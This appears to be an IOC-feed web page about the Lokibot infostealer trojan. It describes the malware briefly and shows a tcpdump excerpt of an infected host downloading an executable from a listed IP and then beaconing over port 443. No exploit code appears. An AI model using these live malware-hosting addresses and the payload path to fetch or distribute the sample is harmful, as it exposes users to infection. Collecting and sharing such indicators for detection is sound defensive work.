AVAST? Business Antivirus Managed 1 Year-AS-EN

Lokibot IOC Feed InfoStealer Trojan malware PCAP file download traffic sample


Download Attachments

  • 1 pcap 3609
    Date added: February 11, 2020 9:30 am Added by: admin File size: 898 KB Downloads: 249

Latest indicators of compromise from our our Lokibot IOC feed. Lokibot is an information stealing (infostealer) trojan targeting users worldwide. It’s was designed for the primary purpose of perpetrating fraud and identity theft.

Lokibot was developed in 2015 to steal information from a variety of applications. Despite the age, this malware is still rather popular among cybercriminals.

 TypeStealer Originex-USSR territory
 First seen3 May, 2015 Last seen11 February, 2020

Also known as LokiLokiPWS

2020-02-11 00:44:29.440705 IP 192.168.86.25.57639 > 107.189.10.150.80: Flags [P.], seq 1:517, ack 1, win 16450, length 516: HTTP: GET /E/3609779.exe HTTP/1.1
E..,+.@…@…V.k.
..’.P…./.”.P.@BlZ..GET /E/3609779.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=113126-
Unless-Modified-Since: Sun, 09 Feb 2020 23:16:32 GMT
If-Range: “413b7-ac800-59e2cd034b0e8”
Host: 107.189.10.150
Connection: Keep-Alive

2020-02-11 00:44:29.548227 IP 107.189.10.150.80 > 192.168.86.25.57639: Flags [.], ack 517, win 490, length 0
E..(.D@.1..wk.
…V..P.’/.”…..P…)e……..
2020-02-11 00:44:29.554394 IP 107.189.10.150.80 > 192.168.86.25.57639: Flags [.], seq 1:1401, ack 517, win 490, length 1400: HTTP: HTTP/1.1 206 Partial Content
E….E@.1…k.
…V..P.’/.”…..P…….HTTP/1.1 206 Partial Content
Date: Tue, 11 Feb 2020 05:45:18 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Sun, 09 Feb 2020 23:16:32 GMT
ETag: “413b7-ac800-59e2cd034b0e8”
Accept-Ranges: bytes
Content-Length: 593434
Content-Range: bytes 113126-706559/706560
Connection: close
Content-Type: application/octet-stream

2020-02-11 00:48:17.818353 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 192:216, ack 97, win 16351, length 24
E..@,/@…….V.4u.L….'G}..V.P.?..<...0...... ..."........... 2020-02-11 00:48:17.870347 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 97:121, ack 216, win 1025, length 24 E..@..@.l.D{4u.L..V.......V.‘G.P……..0……#… ………..
2020-02-11 00:48:22.872814 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 216:240, ack 121, win 16345, length 24
E..@,1@…….V.4u.L….'G...V.P.?......0?.........#........... 2020-02-11 00:49:12.871103 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 240:264, ack 121, win 16345, length 24 E..@,3@.......V.4u.L....‘G…V.P.?……0……!…#………..
2020-02-11 00:49:12.920464 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 121:145, ack 264, win 1025, length 24
E..@..@.l.Dy4u.L..V…….V.'G.P........0......$...!........... 2020-02-11 00:49:17.925374 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 264:288, ack 145, win 16339, length 24 E..@,5@.......V.4u.L....‘G…V.P.?……0?………$………..
2020-02-11 00:50:07.923746 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 288:312, ack 145, win 16339, length 24
E..@,6@…….V.4u.L….'G...V.P.?......0......"...$........... 2020-02-11 00:50:07.975114 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 145:169, ack 312, win 1025, length 24 E..@..@.l.Dw4u.L..V.......V.‘G.P….r…0……%…”………..
2020-02-11 00:50:12.978033 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 312:336, ack 169, win 16333, length 24
E..@,8@…….V.4u.L….'G...W.P.?......0?.........%........... 2020-02-11 00:51:02.976201 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 336:360, ack 169, win 16333, length 24 E..@,9@.......V.4u.L....‘H…W.P.?..v…0……#…%………..
2020-02-11 00:51:03.032248 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 169:193, ack 360, win 1025, length 24
E..@..@.l.Du4u.L..V…….W.'H%P....*...0......&...#........... 2020-02-11 00:51:08.030703 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 360:384, ack 193, win 16327, length 24 E..@,;@.......V.4u.L....‘H%..W%P.?..L…0?………&………..
2020-02-11 00:51:58.028935 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 384:408, ack 193, win 16327, length 24
E..@,<@…….V.4u.L….'H=..W%P.?..4...0......$...&........... 2020-02-11 00:51:58.083799 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 193:217, ack 408, win 1025, length 24 E..@..@.l.Ds4u.L..V.......W%‘HUP……..0……’…$……….. 2020-02-11 00:52:03.083250 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 408:432, ack 217, win 16321, length 24
E..@,>@…….V.4u.L….`’HU..W=P.?..

Please follow and like us:

Written By

admin

Leave a Reply